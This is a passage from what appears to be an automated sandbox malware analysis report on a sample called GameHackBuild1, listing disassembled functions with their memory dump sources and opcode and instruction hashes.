                                      • Opcode Fuzzy Hash: 3214212f9a0e1bf54ce27d62555baa839f6d0bb5842473792d00adbb2d84ba83
                                      • Instruction Fuzzy Hash: B2A001B96092018B9B40CFB6AE096093EA9AA456917098269B50AC6160EA6885629F41
                                      Function 00A15C77 Relevance: .8, Instructions: 800COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d4e6f686245691e8deafc412275daf14c0b6778875d503061389a73a882d99f1
                                      • Instruction ID: 8cf9751ad535fcb21c2e07cef2ddb357e322ec9d2b552b290c21d75008592ed3
                                      • Opcode Fuzzy Hash: d4e6f686245691e8deafc412275daf14c0b6778875d503061389a73a882d99f1
                                      • Instruction Fuzzy Hash: 4862E971A04B859FCB29CF38C9906F9BBE1AF95304F04C56DD8AA8B346D634E985CB14
                                      Function 00A170BF Relevance: .8, Instructions: 773COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9fb576b17390bb22184e2771d7f6d2ea9ddecd1b2d3aee5da0db1480283fe06e
                                      • Instruction ID: 38bd71ce711257f4672095c6176065800e37d6b32ae6feabd2fe7726a1d09e56
                                      • Opcode Fuzzy Hash: 9fb576b17390bb22184e2771d7f6d2ea9ddecd1b2d3aee5da0db1480283fe06e
                                      • Instruction Fuzzy Hash: 1262F27160878A9FC719CF28C9805F9BBF1BF55304F14966DE8A68B742D730E996CB80
                                      Function 00A0ED14 Relevance: .7, Instructions: 694COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5440585dfd394d5fd8077a7b337b4bea55dec9cc4813816d2c704a90d235d1aa
                                      • Instruction ID: 3460e1cbdc3adec7ed6068c87d5e727f14885dca43d75624e8aa5628cd0f7557
                                      • Opcode Fuzzy Hash: 5440585dfd394d5fd8077a7b337b4bea55dec9cc4813816d2c704a90d235d1aa
                                      • Instruction Fuzzy Hash: 3D523AB26087058FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA19CB86
                                      Function 00A16A7B Relevance: .5, Instructions: 509COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 812b6346aa954855af07ccd2866c345bc8f865446b94536792dd6c2bd229148c
                                      • Instruction ID: 57f27b4e328f1632f75e9a94e97038e0adfc72691ed87ec5a2463101b80d7f50
                                      • Opcode Fuzzy Hash: 812b6346aa954855af07ccd2866c345bc8f865446b94536792dd6c2bd229148c
                                      • Instruction Fuzzy Hash: 7412C1B17047068BC728CF28D990AB9B7E1FF58308F14892EE597C7A81D774A8E5CB45
                                      Function 00A0BE13 Relevance: .4, Instructions: 449COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1d3c34bfb415cfe69d59e2ce7529c99a5d1c92ae7b03a41ef38f880d819f39a7
                                      • Instruction ID: 17f48df5a731e71ea427e358da3a7fd3ff2414057ed9551ce528ae5f6fb5296d
                                      • Opcode Fuzzy Hash: 1d3c34bfb415cfe69d59e2ce7529c99a5d1c92ae7b03a41ef38f880d819f39a7
                                      • Instruction Fuzzy Hash: CAF19B72A183198FC718CF29E58496EBBE1EFC9324F148B2EF49597291D730E905CB52
                                      Function 00A20B43 Relevance: .3, Instructions: 345COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction ID: 8983da443697821b190ef67dfa365339a2a29d3bec39beb7fe9f220aa576b180
                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction Fuzzy Hash: 83C1AF362050B30ADF2D473DA53483FFAA25AA27B131A077DD4B2CB5D6FE20D564DA20
                                      Function 00A20F78 Relevance: .3, Instructions: 341COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction ID: f9ec97d5b964c19a546b8c999e349df3f11358a3739ea329bd777b1217c69de0
                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction Fuzzy Hash: 4BC193362095B30ADF6D473DA53443FBAA25AA27B131A077DE4B2CB4C5FE20D564DA20
                                      Function 00A2070E Relevance: .3, Instructions: 331COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                      • Instruction ID: dc1f2937ce8f44e57f57529e4f42b1d147ceb4aa41f605bd62b0528611a50e60
                                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                      • Instruction Fuzzy Hash: CFC190362055B30ADF2D473DA53483FBAA25AA27B131A077DD4B3CB5C6FE20D564DA20
                                      Function 00A202F6 Relevance: .3, Instructions: 323COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction ID: 2df2e8399b47309d283449a709da93d7c890cccf4bb80df15be7cc981e38628e
                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction Fuzzy Hash: A5C1A3362055B30ADF2D873DA53483FBAA25AA17B131A077DD4B3CB5D6FE20D524DA20
                                      Function 00A0E2A0 Relevance: .3, Instructions: 318COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 177b6fe814c1e69309c4b245eaf7a9fcc4723bafa91e941ec417755a991652bd
                                      • Instruction ID: 49739dbe508b19916adf71094ca3b6a4e970938031f5b67d287ac053ea61e842
                                      • Opcode Fuzzy Hash: 177b6fe814c1e69309c4b245eaf7a9fcc4723bafa91e941ec417755a991652bd
                                      • Instruction Fuzzy Hash: 26E126799183848FC304CF69D89096ABBF0ABDA300F85095EF5D597352C336EA19DB62
                                      Function 00A13A3C Relevance: .3, Instructions: 263COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a6ee40635f5eb985b3bbee2261c61159bd369e52b8a1a067f630af1631055f8c
                                      • Instruction ID: 4d621faf2ebabdbc7afc034735d56106733c92e889271a4ecdc94c06770ed848
                                      • Opcode Fuzzy Hash: a6ee40635f5eb985b3bbee2261c61159bd369e52b8a1a067f630af1631055f8c
                                      • Instruction Fuzzy Hash: 8B915B722087498BDF24EF68D991BFA77E5EF90300F10492DE597D72C2EA749688C381
                                      Function 00A24969 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2d0bc21953d1cf7da74f6ad1bb32984e2b7059808fb75242b23e32a3e582cd92
                                      • Instruction ID: 1d838e4916a07e7e8d8bd43a4c52140a92266bc4cae5cc031153f441a54000e5
                                      • Opcode Fuzzy Hash: 2d0bc21953d1cf7da74f6ad1bb32984e2b7059808fb75242b23e32a3e582cd92
                                      • Instruction Fuzzy Hash: 4B619B71A84B3856DE389B2CB955BBF2394EB0D780F100A39E883DB2C1D651DD82C759
                                      Function 00A13D6D Relevance: .2, Instructions: 232COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                      • Instruction ID: d2e0b3960cd00f2b411606a7764fd91f9d831de1a99609363c504b28c1193d52
                                      • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                      • Instruction Fuzzy Hash: 557102727043454BDF24DF29D9D0BFE77E5ABA4304F00492DE9C68B2C2DA749ACA8752
                                      Function 00A2473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60b7de3cb2a39437cdc6fe6ef6c29ff78e73ae8b7f18a3af6c87a7ac86428b6e
                                      • Instruction ID: d4c21bf6f1a715cec8c30bccce0ff77cd4defca21d250f6f5d75cc1b72f1ce4d
                                      • Opcode Fuzzy Hash: 60b7de3cb2a39437cdc6fe6ef6c29ff78e73ae8b7f18a3af6c87a7ac86428b6e
                                      • Instruction Fuzzy Hash: 50518870A10AB45BDB388B3CB955BBF27D9AB5F300F180539E993DB282C324DD419392
                                      Function 00A0DE6C Relevance: .2, Instructions: 190COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 88a2611c7a51ba895fdc97861134805914643a57c2252e68cf242a9e67e6dbe9
                                      • Instruction ID: 2b0a481693c7d62a9b5ae2741b7c506bbca5752d47809ab594c818c176633d2b
                                      • Opcode Fuzzy Hash: 88a2611c7a51ba895fdc97861134805914643a57c2252e68cf242a9e67e6dbe9
                                      • Instruction Fuzzy Hash: EE819F9E61D6D8DEC716CFBC38A42B93FA157B3300B1845AAC4C6C62A3C177459AD722
                                      Function 00A0E8A0 Relevance: .2, Instructions: 154COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 465b728b596a0255ba025d2ad261cacbe4c5018ea29737475f2086837c838f69
                                      • Instruction ID: 9923a90b89f71d5df14f81a4c6a7b594f04cbc238bf265c845175145a2801e08
                                      • Opcode Fuzzy Hash: 465b728b596a0255ba025d2ad261cacbe4c5018ea29737475f2086837c838f69
                                      • Instruction Fuzzy Hash: 1E51D035A083D94EC712CF28A18056EFFE0BFDA354F594C9EE4D55B242D2209649DB92
                                      Function 00A0F968 Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00a08b0108029b1ee80143d2c3a6372bb1803bc646f10569c24c6e3519ccc905
                                      • Instruction ID: 102a7dde95b867f456fc03f5987b3fc86237a163977f65e988502cb08c7d271b
                                      • Opcode Fuzzy Hash: 00a08b0108029b1ee80143d2c3a6372bb1803bc646f10569c24c6e3519ccc905
                                      • Instruction Fuzzy Hash: 90512671A083158FC748CF19E48055AF7E1FFC8354F058A2EE899A7740DB34E959CB96
                                      Function 00A137C1 Relevance: .1, Instructions: 112COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                      • Instruction ID: a4ff851d60c01f5617ec0cec516820fe9748a14cba1ac26a85340298c71024e1
                                      • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                      • Instruction Fuzzy Hash: 3E312BB26047498FCB14DF28C8512AEBBE0FB95310F14892DE4D5C7382C735EA89CB91
                                      Function 00A05F3C Relevance: .1, Instructions: 76COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bf20ceec5c8d80c975fb9f66e54a77dbf31447cbf102b29e3d8fa6ec0fc8892
                                      • Instruction ID: de5343630bf2d494730c038799e11131cbe5724ba915243f2908e9da05677e17
                                      • Opcode Fuzzy Hash: 6bf20ceec5c8d80c975fb9f66e54a77dbf31447cbf102b29e3d8fa6ec0fc8892
